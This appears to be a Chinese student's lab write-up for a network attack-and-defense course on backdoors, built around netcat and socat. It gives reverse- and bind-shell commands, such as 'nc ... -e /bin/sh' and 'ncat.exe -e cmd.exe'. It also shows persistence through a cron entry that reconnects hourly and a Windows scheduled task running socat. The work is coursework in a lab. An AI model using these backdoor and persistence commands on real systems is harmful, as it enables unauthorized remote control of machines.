不经过正常认证流程而访问系统的通道。
还有就是潜伏于操作系统中或伪装为特定应用的专用后门程序。
概念和木马有重叠
NC或netcat:是一个底层工具,进行基本的TCP UDP数据收发。常被与其他工具结合使用,起到后门的作用。
Linux: 一般自带netcat,"man netcat" 或"man nc"可查看其使用说明。Windows: 课程主页附件中下载ncat.rar解压即可使用。Mac: 系统自带,"man nc",查看其使用说明。
C:\Users\S2中,这样命令行中直接进入即可)Windows+r输入cmd打开命令行,输入ipconfig查看主机IP地址nc所在文件夹中,输入ncat.exe -l -p <端口号>,如图:kali终端中输入nc <主机IP地址> <之前输入的端口号> -e /bin/sh,如图:windows下获得一个linux shell,可运行任何指令,如ls,pwdip add查看Linux的IP地址nc -l -p <端口号>,使其处于监听状态ncat.exe -e cmd.exe ip_of_linux <之前输入的端口号>ncat.exe -l 5227监听5227端口crontab -e编辑一条定时任务,之后选择编辑器3,在底行插入30 * * * * /bin/netcat 192.168.171.1 5227 -e /bin/sh,即在每个小时的第30分钟反向连接主机的5227端口。socat.rar,然后解压到自选路径。右键->计算机管理->任务计划程序->创建任务常规选项卡中填写任务名称( 这里我起名为zxysocat ),然后在触发器选项卡中新建触发器,参照下图选择:操作选项卡中,选择新建操作,设置中程序或脚本处选中你所下载解压的socat.exe的路径,在添加参数中填入tcp-listen:<端口号> exec:cmd.exe,pty,stderr,即将cmd.exe绑定到该端口号,同时把cmd.exe的stderr重定向stdout上。socat - tcp:<主机IP>:<之前输入的端口号>,其中-表示标准输入/出,第二个流连接到主机的相应端口。之后发现已经成功获得一个cmd ShellLinux的IP地址,ifconfig命令无法找到,如图:ifconfig命令相关的工具包,上网搜索之后该命令在net-tools中,apt-get install net-tools后显示该工具包已经安装,如图:之后经过发现一篇博文发现ifconfig命令已经被逐渐淘汰,建议选用ip add命令,果真查到了IP地址结果在此。
关闭防火墙,卸载安全软件后,Linux成功进入Windows Shell,结果在此。
描述:未安装execstack,如图:
sudo apt-get update和sudo apt-get install execstack等待片刻即可。##### 3.4 问题4
2019-2020-2 20175227张雪莹《网络对抗技术》 Exp2 后门原理与实践
原文:https://www.cnblogs.com/zxy20175227/p/12453642.html